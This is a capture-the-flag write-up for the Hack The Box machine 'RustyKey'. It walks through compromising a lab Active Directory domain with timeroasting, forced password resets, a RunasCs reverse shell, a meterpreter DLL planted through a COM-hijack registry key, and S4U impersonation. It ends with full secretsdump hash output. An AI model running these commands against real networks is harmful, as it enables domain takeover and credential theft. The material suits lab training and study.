HTB-RustyKey

Box Info

Difficulty	Hard
OS	Windows
IP Address	10.10.11.75

Port Scanning

# Check all open TCP
sudo rustscan -a 10.10.11.75 -g -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.75 -sCV -Pn -sT -p 53,88,135,139,445,464,593,3268,5985,389,9389,47001,49664,49665,49666,49671,49667,49669,49670,49677,49673,49674,49689,49718
# Nmap scan vulnerability 
sudo nmap -sT -p 53,88,135,139,445,464,593,3268,5985,389,9389,47001,49664,49665,49666,49671,49667,49669,49670,49677,49673,49674,49689,49718 --script=vuln -O -Pn 10.10.11.75
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.75

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-02 15:38:41Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
49718/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-07-02T15:39:39
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h37m19s

Update DNS

sudo nano /etc/hosts
10.10.11.75 dc.rustykey.htb rustykey.htb

Update krb5.conf

[libdefaults]
  default_realm = RUSTYKEY.HTB
  dns_lookup_realm = false
  dns_lookup_kdc = false

[realms]
  RUSTYKEY.HTB = {
    kdc = dc.rustykey.htb
    admin_server = dc.rustykey.htb
    default_domain = rustykey.htb
  }

[domain_realm]
  .rustykey.htb = RUSTYKEY.HTB
  rustykey.htb = RUSTYKEY.HTB

Credentials

As is common in real life Windows pentests, you will start the RustyKey box with credentials for the following account

rr.parker : 8#t5HE8L!W3A

Service Enumeration

389/tcp - LDAP

ldapsearch -x -H ldap://10.10.11.75 -D 'rr.parker@rustykey.htb' -w '8#t5HE8L!W3A' -b 'dc=rustykey,dc=htb' "(objectClass=user)" userPrincipalName

• Result

  # Administrator, Users, rustykey.htb
  dn: CN=Administrator,CN=Users,DC=rustykey,DC=htb
  
  # Guest, Users, rustykey.htb
  dn: CN=Guest,CN=Users,DC=rustykey,DC=htb
  
  # DC, Domain Controllers, rustykey.htb
  dn: CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb
  
  # krbtgt, Users, rustykey.htb
  dn: CN=krbtgt,CN=Users,DC=rustykey,DC=htb
  
  # Support-Computer1, Computers, Support, rustykey.htb
  dn: CN=Support-Computer1,OU=Computers,OU=Support,DC=rustykey,DC=htb
  
  # Support-Computer2, Computers, Support, rustykey.htb
  dn: CN=Support-Computer2,OU=Computers,OU=Support,DC=rustykey,DC=htb
  
  # Support-Computer3, Computers, Support, rustykey.htb
  dn: CN=Support-Computer3,OU=Computers,OU=Support,DC=rustykey,DC=htb
  
  # Support-Computer4, Computers, Support, rustykey.htb
  dn: CN=Support-Computer4,OU=Computers,OU=Support,DC=rustykey,DC=htb
  
  # Support-Computer5, Computers, Support, rustykey.htb
  dn: CN=Support-Computer5,OU=Computers,OU=Support,DC=rustykey,DC=htb
  
  # Finance-Computer1, Computers, Finance, rustykey.htb
  dn: CN=Finance-Computer1,OU=Computers,OU=Finance,DC=rustykey,DC=htb
  
  # Finance-Computer2, Computers, Finance, rustykey.htb
  dn: CN=Finance-Computer2,OU=Computers,OU=Finance,DC=rustykey,DC=htb
  
  # Finance-Computer3, Computers, Finance, rustykey.htb
  dn: CN=Finance-Computer3,OU=Computers,OU=Finance,DC=rustykey,DC=htb
  
  # Finance-Computer4, Computers, Finance, rustykey.htb
  dn: CN=Finance-Computer4,OU=Computers,OU=Finance,DC=rustykey,DC=htb
  
  # Finance-Computer5, Computers, Finance, rustykey.htb
  dn: CN=Finance-Computer5,OU=Computers,OU=Finance,DC=rustykey,DC=htb
  
  # IT-Computer1, Computers, IT, rustykey.htb
  dn: CN=IT-Computer1,OU=Computers,OU=IT,DC=rustykey,DC=htb
  
  # IT-Computer2, Computers, IT, rustykey.htb
  dn: CN=IT-Computer2,OU=Computers,OU=IT,DC=rustykey,DC=htb
  
  # IT-Computer3, Computers, IT, rustykey.htb
  dn: CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb
  
  # IT-Computer4, Computers, IT, rustykey.htb
  dn: CN=IT-Computer4,OU=Computers,OU=IT,DC=rustykey,DC=htb
  
  # IT-Computer5, Computers, IT, rustykey.htb
  dn: CN=IT-Computer5,OU=Computers,OU=IT,DC=rustykey,DC=htb
  
  # rr.parker, Users, rustykey.htb
  dn: CN=rr.parker,CN=Users,DC=rustykey,DC=htb
  userPrincipalName: rr.parker@rustykey.htb
  
  # mm.turner, Users, rustykey.htb
  dn: CN=mm.turner,CN=Users,DC=rustykey,DC=htb
  userPrincipalName: mm.turner@rustykey.htb
  
  # bb.morgan, Users, IT, rustykey.htb
  dn: CN=bb.morgan,OU=Users,OU=IT,DC=rustykey,DC=htb
  userPrincipalName: bb.morgan@rustykey.htb
  
  # gg.anderson, Users, IT, rustykey.htb
  dn: CN=gg.anderson,OU=Users,OU=IT,DC=rustykey,DC=htb
  userPrincipalName: gg.anderson@rustykey.htb
  
  # dd.ali, Users, Finance, rustykey.htb
  dn: CN=dd.ali,OU=Users,OU=Finance,DC=rustykey,DC=htb
  userPrincipalName: dd.ali@rustykey.htb
  
  # ee.reed, Users, Support, rustykey.htb
  dn: CN=ee.reed,OU=Users,OU=Support,DC=rustykey,DC=htb
  userPrincipalName: ee.reed@rustykey.htb
  
  # nn.marcos, Users, rustykey.htb
  dn: CN=nn.marcos,CN=Users,DC=rustykey,DC=htb
  userPrincipalName: nn.marcos@rustykey.htb
  
  # backupadmin, Users, rustykey.htb
  dn: CN=backupadmin,CN=Users,DC=rustykey,DC=htb
  userPrincipalName: backupadmin@rustykey.htb
  
  # search reference
  ref: ldap://ForestDnsZones.rustykey.htb/DC=ForestDnsZones,DC=rustykey,DC=htb
  
  # search reference
  ref: ldap://DomainDnsZones.rustykey.htb/DC=DomainDnsZones,DC=rustykey,DC=htb
  
  # search reference
  ref: ldap://rustykey.htb/CN=Configuration,DC=rustykey,DC=htb

Bloodhound

Correct Clock Skew

sudo timedatectl set-ntp 0
sudo ntpdate -u 10.10.11.75

Obtain ticket

impacket-getTGT rustykey.htb/rr.parker:'8#t5HE8L!W3A'
chmod 600 rr.parker.ccache
export KRB5CCNAME=rr.parker.ccache

Enumerate Domain info

bloodhound-python -u "rr.parker" -p '8#t5HE8L!W3A' -d rustykey.htb -c All --zip -ns 10.10.11.75 -k

Extract users list

ldapsearch -D rustykey\\rr.parker -H ldap://10.10.11.75 -w '8#t5HE8L!W3A' -b 'CN=Users,DC=rustykey,DC=htb' | grep name: | sed 's/^name: //' | grep -vE 'D|C|A|U' > users.txt

IT-COMPUTER3 OU can add itself to Helpdesk Group

Once obtained Helpdesk User Groups will gain the privilege to DD.ALI BB.MORGAN GG.ANDERSON and EE.REED

MM.TURNER user has AddAllowedToAct rights on the Domain Controller

BB.MORGAN GG.ANDERSON and EE.REED had the privilege to Win-RM

Initiate User Foothold

Timeroasting of IT-COMPUTER3$

https://github.com/SecuraBV/Timeroast

Timeroasting takes advantage of Windows’ NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account’s RID. This is not a problem when computer accounts are properly generated, but if a non-standard or legacy default password is set this tool allows you to brute-force those offline.

Prep for the environment

git clone https://github.com/SecuraBV/Timeroast
python3 -m venv venv
source venv/bin/activate

Inside the extra-scripts directory, there is a timecrack.py which we will use it to timeroast

#!/usr/bin/env python3

"""Perform a simple dictionary attack against the output of timeroast.py. Necessary becausethe NTP 'hash' format unfortunately does not fit into Hashcat or John right now.Not even remotely optimized, but still useful for cracking legacy default passwords (where thepassword is the computer name) or specific default passwords that are popular in an organisation."""

from binascii import hexlify, unhexlify
from argparse import ArgumentParser, FileType, RawDescriptionHelpFormatter
from typing import TextIO, Generator, Tuple
import hashlib, sys, re

HASH_FORMAT = r'^(?P<rid>\d+):\$sntp-ms\$(?P<hashval>[0-9a-f]{32})\$(?P<salt>[0-9a-f]{96})$'

def md4(data: bytes) -> bytes: 
	try: 
		return hashlib.new('md4', data).digest() 
	except ValueError: 
		from md4 import MD4 # Fallback to pure Python if OpenSSL has no MD4 
		return MD4(data).bytes()
		
def compute_hash(password: str, salt: bytes) -> bytes: 
	"""Compute a legacy NTP authenticator 'hash'. """ 
	return hashlib.md5(md4(password.encode('utf-16le')) + salt).digest()
	
def try_crack(hashfile: TextIO, dictfile: TextIO) -> Generator[Tuple[int, str], None, None]:
	hashes = [] 
	for line in hashfile: 
		line = line.strip()
		if line: 
			m = re.match(HASH_FORMAT, line) 
			if not m: 
				print(f'ERROR: invalid hash format: {line}', file=sys.stderr)
				sys.exit(1)
			rid, hashval, salt = m.group('rid', 'hashval', 'salt') 
			hashes.append((int(rid), unhexlify(hashval), unhexlify(salt)))
			
		for password in dictfile: 
			password = password.strip() 
			for rid, hashval, salt in hashes: 
				if compute_hash(password, salt) == hashval: 
					yield rid, password
	
def main():
	argparser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, description="""Perform a simple dictionary attack against the output of timeroast.py.Not even remotely optimized, but still useful for cracking legacy defaultpasswords (where the password is the computer name) or specific defaultpasswords that are popular in an organisation.""")
	
	argparser.add_argument('hashes', type=FileType('r'), help='Output of timeroast.py') 
	#argparser.add_argument('dictionary', type=FileType('r'), help='Line-delimited password dictionary') <-- comment this line and add the line below
	argparser.add_argument('dictionary', type=lambda f: open(f, encoding='latin-1'),help='Line-delimited password dictionary (e.g. rockyou.txt)')
	args = argparser.parse_args()
	
	crackcount = 0 
	for rid, password in try_crack(args.hashes, args.dictionary): 
		print(f'[+] Cracked RID {rid} password: {password}') 
		crackcount += 1 
		
	print(f'\n{crackcount} passwords recovered.')
	
if __name__ == '__main__':
  main()

python3 timeroast.py 10.10.11.75 -o rustykey.hashes

# Modify the timecrack.py
python3 timecrack.py rustykey.hashes /usr/share/wordlists/rockyou.txt

Here we get the password Rusty88! and checked bloodhound on the RID 1125 found it is belongs to IT-COMPUTER3$

Here we can abuse this password to add IT-COMPUTER3$ to the HELPDESK group

AddSelf to HELPDESK

bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'

ForceChangePassword to BB.MORGAN

bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password BB.MORGAN 'Password123'

Remove Protected Objects

bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'IT'

Now we can obtain BB.MORGAN kerberos ticket

impacket-getTGT 'RUSTYKEY.HTB/BB.MORGAN:Password123'

BB.MORGAN shell

export KRB5CCNAME=BB.MORGAN.ccache
evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB

User Flag

Privilege Escalation

internal.pdf

From the user desktop found a internal.pdf file

Use WinRM transfer to KALI

download internal.pdf

It is an memo from BB.MORGAN to support-team

The memo describes that the Support Group temporarily receives extended rights such as access to Registry Keys and from bloodhound we know that EE.REED user is belongs to the SUPPORT group

Here we will remove SUPPORT from protected objects, and abuse HELPDESK group to ForceChangePassword for the EE.REED user. Then go into EE.REED with WinRM sessions

EE.REED Shell

# Add IT-COMPUTER3$ OU to the HELPDESK again
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'

# Remove Support OU from PROTECTED OBJECTS 
bloodyAD --kerberos --dc-ip 10.10.11.75 --host dc.rustykey.htb -d rustykey.htb -u IT-COMPUTER3$ -p 'Rusty88!' remove groupMember "CN=PROTECTED OBJECTS,CN=USERS,DC=RUSTYKEY,DC=HTB" "SUPPORT"

# ForceChangePassword user EE.REED
bloodyAD --kerberos --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password ee.reed 'P@ssword123'

impacket-getTGT -dc-ip 10.10.11.75 rustykey.htb/ee.reed:'P@ssword123'

export KRB5CCNAME=ee.reed.ccache
evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB -u ee.reed

Looks like we cannot establish EE.REED shell with winrm, upon checking writeups, seems only can execute with RunasCs via our existing shell with BB.MORGAN

Upload RunasCS.exe

iwr -uri http://10.10.14.11/RunasCs.exe -o RunasCs.exe
.\RunasCs.exe ee.reed P@ssword123 cmd.exe -r 10.10.14.11:4444

MM.TURNER Shell

Prep for msfconsole

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp 
set LHOST tun0
set LPORT 4445
run -j

We can setup DLL-based meterpreter backdoor via a COM hijacking vulnerability

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.11 LPORT=4445 -f dll -o rev.dll

mkdir C:\Tools
upload rev.dll

Add the DLL path to registry

reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\Tools\rev.dll" /f

After a few seconds, we will get a Revshell, here we need to be quick as the session will died quick.

Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$

Now MM.TURNER should have the AddAllowToAct privilege into RUSTYKEY Domain Controller

Initiate Root Foothold

Impersonate Domain Admin Account

Here we will use S4U2Self to impersonate domain admin account

impacket-getST -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.10.11.75 -k 'RUSTYKEY.HTB/IT-COMPUTER3$:Rusty88!'

export KRB5CCNAME=backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache

Here we can abuse the ESC1 Technique for Alternative DCSync (Mimikatz).

Unintention way - Backupadmin Shell

impacket-wmiexec -k -no-pass 'RUSTYKEY.HTB/backupadmin@dc.rustykey.htb'

backupadmin have the privilege to access Administrator path

Secretsdump

impacket-secretsdump -k -no-pass 'RUSTYKEY.HTB/backupadmin@dc.rustykey.htb'

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x94660760272ba2c07b13992b57b432d4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e3aac437da6f5ae94b01a6e5347dd920:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
RUSTYKEY\DC$:plain_password_hex:0c7fbe96b20b5afd1da58a1d71a2dbd6ac75b42a93de3c18e4b7d448316ca40c74268fb0d2281f46aef4eba9cd553bbef21896b316407ae45ef212b185b299536547a7bd796da250124a6bb3064ae48ad3a3a74bc5f4d8fbfb77503eea0025b3194af0e290b16c0b52ca4fecbf9cfae6a60b24a4433c16b9b6786a9d212c7aaefefa417fe33cc7f4dcbe354af5ce95f407220bada9b4d841a3aa7c6231de9a9ca46a0621040dc384043e19800093303e1485021289d8719dd426d164e90ee3db3914e3d378cc9e80560f20dcb64b488aa468c1b71c2bac3addb4a4d55231d667ca4ba2ad36640985d9b18128f7755b25
RUSTYKEY\DC$:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
[*] DefaultPassword 
RUSTYKEY\Administrator:Rustyrc4key#!
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3c06efaf194382750e12c00cd141d275522d8397
dpapi_userkey:0xb833c05f4c4824a112f04f2761df11fefc578f5c
[*] NL$KM 
 0000   6A 34 14 2E FC 1A C2 54  64 E3 4C F1 A7 13 5F 34   j4.....Td.L..._4
 0010   79 98 16 81 90 47 A1 F0  8B FC 47 78 8C 7B 76 B6   y....G....Gx.{v.
 0020   C0 E4 94 9D 1E 15 A6 A9  70 2C 13 66 D7 23 A1 0B   ........p,.f.#..
 0030   F1 11 79 34 C1 8F 00 15  7B DF 6F C7 C3 B4 FC FE   ..y4....{.o.....
NL$KM:6a34142efc1ac25464e34cf1a7135f34799816819047a1f08bfc47788c7b76b6c0e4949d1e15a6a9702c1366d723a10bf1117934c18f00157bdf6fc7c3b4fcfe
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f7a351e12f70cc177a1d5bd11b28ac26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f4ad30fa8d8f2cfa198edd4301e5b0f3:::
rustykey.htb\rr.parker:1137:aad3b435b51404eeaad3b435b51404ee:d0c72d839ef72c7d7a2dae53f7948787:::
rustykey.htb\mm.turner:1138:aad3b435b51404eeaad3b435b51404ee:7a35add369462886f2b1f380ccec8bca:::
rustykey.htb\bb.morgan:1139:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
rustykey.htb\gg.anderson:1140:aad3b435b51404eeaad3b435b51404ee:93290d859744f8d07db06d5c7d1d4e41:::
rustykey.htb\dd.ali:1143:aad3b435b51404eeaad3b435b51404ee:20e03a55dcf0947c174241c0074e972e:::
rustykey.htb\ee.reed:1145:aad3b435b51404eeaad3b435b51404ee:cb8a428385459087a76793010d60f5dc:::
rustykey.htb\nn.marcos:1146:aad3b435b51404eeaad3b435b51404ee:33aa36a7ec02db5f2ec5917ee544c3fa:::
rustykey.htb\backupadmin:3601:aad3b435b51404eeaad3b435b51404ee:34ed39bc39d86932b1576f23e66e3451:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
Support-Computer1$:1103:aad3b435b51404eeaad3b435b51404ee:5014a29553f70626eb1d1d3bff3b79e2:::
Support-Computer2$:1104:aad3b435b51404eeaad3b435b51404ee:613ce90991aaeb5187ea198c629bbf32:::
Support-Computer3$:1105:aad3b435b51404eeaad3b435b51404ee:43c00d56ff9545109c016bbfcbd32bee:::
Support-Computer4$:1106:aad3b435b51404eeaad3b435b51404ee:c52b0a68cb4e24e088164e2e5cf2b98a:::
Support-Computer5$:1107:aad3b435b51404eeaad3b435b51404ee:2f312c564ecde3769f981c5d5b32790a:::
Finance-Computer1$:1118:aad3b435b51404eeaad3b435b51404ee:d6a32714fa6c8b5e3ec89d4002adb495:::
Finance-Computer2$:1119:aad3b435b51404eeaad3b435b51404ee:49c0d9e13319c1cb199bc274ee14b04c:::
Finance-Computer3$:1120:aad3b435b51404eeaad3b435b51404ee:65f129254bea10ac4be71e453f6cabca:::
Finance-Computer4$:1121:aad3b435b51404eeaad3b435b51404ee:ace1db31d6aeb97059bf3efb410df72f:::
Finance-Computer5$:1122:aad3b435b51404eeaad3b435b51404ee:b53f4333805f80406b4513e60ef83457:::
IT-Computer1$:1123:aad3b435b51404eeaad3b435b51404ee:fe60afe8d9826130f0e06cd2958a8a61:::
IT-Computer2$:1124:aad3b435b51404eeaad3b435b51404ee:73d844e19c8df244c812d4be1ebcff80:::
IT-Computer3$:1125:aad3b435b51404eeaad3b435b51404ee:b52b582f02f8c0cd6320cd5eab36d9c6:::
IT-Computer4$:1126:aad3b435b51404eeaad3b435b51404ee:763f9ea340ccd5571c1ffabf88cac686:::
IT-Computer5$:1127:aad3b435b51404eeaad3b435b51404ee:1679431d1c52638688b4f1321da14045:::
[*] Kerberos keys grabbed
Administrator:des-cbc-md5:e007705d897310cd
krbtgt:aes256-cts-hmac-sha1-96:ee3271eb3f7047d423c8eeaf1bd84f4593f1f03ac999a3d7f3490921953d542a
krbtgt:aes128-cts-hmac-sha1-96:24465a36c2086d6d85df701553a428af
krbtgt:des-cbc-md5:d6d062fd1fd32a64
rustykey.htb\rr.parker:des-cbc-md5:8c5b3b54b9688aa1
rustykey.htb\mm.turner:aes256-cts-hmac-sha1-96:707ba49ed61c6575bfe9a3fd1541fc008e8803bfb0d7b5d21122cc464f39cbb9
rustykey.htb\mm.turner:aes128-cts-hmac-sha1-96:a252d2716a0b365649eaec02f84f12c8
rustykey.htb\mm.turner:des-cbc-md5:a46ea77c13854945
rustykey.htb\bb.morgan:des-cbc-md5:544cf861293bf40d
rustykey.htb\gg.anderson:des-cbc-md5:8923850da84f2c0d
rustykey.htb\dd.ali:des-cbc-md5:613da45e3bef34a7
rustykey.htb\ee.reed:des-cbc-md5:cefe6b02808c1c0b
rustykey.htb\nn.marcos:aes256-cts-hmac-sha1-96:53ee5251000622bf04e80b5a85a429107f8284d9fe1ff5560a20ec8626310ee8
rustykey.htb\nn.marcos:aes128-cts-hmac-sha1-96:cf00314169cb7fea67cfe8e0f7925a43
rustykey.htb\nn.marcos:des-cbc-md5:e358835b1c238661
rustykey.htb\backupadmin:des-cbc-md5:625e25fe70a77358
DC$:des-cbc-md5:915d9d52a762675d
Support-Computer1$:aes256-cts-hmac-sha1-96:89a52d7918588ddbdae5c4f053bbc180a41ed703a30c15c5d85d123457eba5fc
Support-Computer1$:aes128-cts-hmac-sha1-96:3a6188fdb03682184ff0d792a81dd203
Support-Computer1$:des-cbc-md5:c7cb8a76c76dfed9
Support-Computer2$:aes256-cts-hmac-sha1-96:50f8a3378f1d75df813db9d37099361a92e2f2fb8fcc0fc231fdd2856a005828
Support-Computer2$:aes128-cts-hmac-sha1-96:5c3fa5c32427fc819b10f9b9ea4be616
Support-Computer2$:des-cbc-md5:a2a202ec91e50b6d
Support-Computer3$:aes256-cts-hmac-sha1-96:e3b7b8876ac617dc7d2ba6cd2bea8de74db7acab2897525dfd284c43c8427954
Support-Computer3$:aes128-cts-hmac-sha1-96:1ea036e381f3279293489c19cfdeb6c1
Support-Computer3$:des-cbc-md5:c13edcfe4676f86d
Support-Computer4$:aes256-cts-hmac-sha1-96:1708c6a424ed59dedc60e980c8f2ab88f6e2bb1bfe92ec6971c8cf5a40e22c1e
Support-Computer4$:aes128-cts-hmac-sha1-96:9b6d33ef93c69721631b487dc00d3047
Support-Computer4$:des-cbc-md5:3b79647680e0d57a
Support-Computer5$:aes256-cts-hmac-sha1-96:464551486df4086accee00d3d37b60de581ee7adad2a6a31e3730fad3dfaed42
Support-Computer5$:aes128-cts-hmac-sha1-96:1ec0c93b7f9df69ff470e2e05ff4ba89
Support-Computer5$:des-cbc-md5:73abb53162d51fb3
Finance-Computer1$:aes256-cts-hmac-sha1-96:a57ce3a3e4ee34bc08c8538789fa6f99f5e8fb200a5f77741c5bf61b3d899918
Finance-Computer1$:aes128-cts-hmac-sha1-96:e62b7b772aba6668af65e9d1422e6aea
Finance-Computer1$:des-cbc-md5:d9914cf29e76f8df
Finance-Computer2$:aes256-cts-hmac-sha1-96:4d45b576dbd0eab6f4cc9dc75ff72bffe7fae7a2f9dc50b5418e71e8dc710703
Finance-Computer2$:aes128-cts-hmac-sha1-96:3fd0dd200120ca90b43af4ab4e344a78
Finance-Computer2$:des-cbc-md5:23ef512fb3a8d37c
Finance-Computer3$:aes256-cts-hmac-sha1-96:1b2280d711765eb64bdb5ab1f6b7a3134bc334a3661b3335f78dd590dee18b0d
Finance-Computer3$:aes128-cts-hmac-sha1-96:a25859c88f388ae7134b54ead8df7466
Finance-Computer3$:des-cbc-md5:2a688a43ab40ecba
Finance-Computer4$:aes256-cts-hmac-sha1-96:291adb0905f3e242748edd1c0ecaab34ca54675594b29356b90da62cf417496f
Finance-Computer4$:aes128-cts-hmac-sha1-96:81fed1f0eeada2f995ce05bbf7f8f951
Finance-Computer4$:des-cbc-md5:6b7532c83bc84c49
Finance-Computer5$:aes256-cts-hmac-sha1-96:6171c0240ae0ce313ecbd8ba946860c67903b12b77953e0ee38005744507e3de
Finance-Computer5$:aes128-cts-hmac-sha1-96:8e6aa26b24cdda2d7b5474b9a3dc94dc
Finance-Computer5$:des-cbc-md5:92a72f7f865bb6cd
IT-Computer1$:aes256-cts-hmac-sha1-96:61028ace6c840a6394517382823d6485583723f9c1f98097727ad3549d833b1e
IT-Computer1$:aes128-cts-hmac-sha1-96:7d1a98937cb221fee8fcf22f1a16b676
IT-Computer1$:des-cbc-md5:019d29370ece8002
IT-Computer2$:aes256-cts-hmac-sha1-96:e9472fb1cf77df86327e5775223cf3d152e97eebd569669a6b22280316cf86fa
IT-Computer2$:aes128-cts-hmac-sha1-96:a80fba15d78f66477f0591410a4ffda7
IT-Computer2$:des-cbc-md5:622f2ae961abe932
IT-Computer3$:aes256-cts-hmac-sha1-96:7871b89896813d9e4a732a35706fe44f26650c3da47e8db4f18b21cfbb7fbecb
IT-Computer3$:aes128-cts-hmac-sha1-96:0e14a9e6fd52ab14e36703c1a4c542e3
IT-Computer3$:des-cbc-md5:f7025180cd23e5f1
IT-Computer4$:aes256-cts-hmac-sha1-96:68f2e30ca6b60ec1ab75fab763087b8772485ee19a59996a27af41a498c57bbc
IT-Computer4$:aes128-cts-hmac-sha1-96:181ffb2653f2dc5974f2de924f0ac24a
IT-Computer4$:des-cbc-md5:bf58cb437340cd3d
IT-Computer5$:aes256-cts-hmac-sha1-96:417a87cdc95cb77997de6cdf07d8c9340626c7f1fbd6efabed86607e4cfd21b8
IT-Computer5$:aes128-cts-hmac-sha1-96:873fd89f24e79dcd0affe6f63c51ec9a
IT-Computer5$:des-cbc-md5:ad5eec6bcd4f86f7
[*] Cleaning up...